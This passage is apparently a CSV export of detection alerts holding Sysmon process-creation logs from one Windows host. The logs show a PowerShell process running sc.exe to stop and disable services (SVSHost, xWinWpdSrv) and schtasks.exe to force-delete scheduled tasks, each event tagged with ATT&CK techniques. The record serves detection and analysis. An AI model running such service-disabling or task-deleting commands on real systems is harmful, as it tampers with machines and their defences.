Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.116",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.761 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-0010d8553000} +ProcessId: 7816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.768775500Z"",""eventRecordID"":""3742"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.761\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-0010d8553000}\r\nProcessId: 7816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.761"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-0010d8553000}"",""processId"":""7816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.075",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.692 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-001083533000} +ProcessId: 2672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.696881900Z"",""eventRecordID"":""3739"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.692\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-001083533000}\r\nProcessId: 2672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.692"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-001083533000}"",""processId"":""2672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.031",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.661 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-0010ac523000} +ProcessId: 7924 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config xWinWpdSrv Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config xWinWpdSrv Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.667480200Z"",""eventRecordID"":""3738"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.661\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-0010ac523000}\r\nProcessId: 7924\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config xWinWpdSrv Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.661"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-0010ac523000}"",""processId"":""7924"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config xWinWpdSrv Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.530",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.418 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00103b2d2f00} +ProcessId: 868 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.427343400Z"",""eventRecordID"":""3590"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.418\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00103b2d2f00}\r\nProcessId: 868\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.418"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-00103b2d2f00}"",""processId"":""868"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.501",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.382 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010902b2f00} +ProcessId: 2772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.385206000Z"",""eventRecordID"":""3589"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.382\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010902b2f00}\r\nProcessId: 2772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.382"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-0010902b2f00}"",""processId"":""2772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.483",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.322 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010b3292f00} +ProcessId: 7076 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.331099200Z"",""eventRecordID"":""3588"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.322\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010b3292f00}\r\nProcessId: 7076\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.322"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-0010b3292f00}"",""processId"":""7076"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 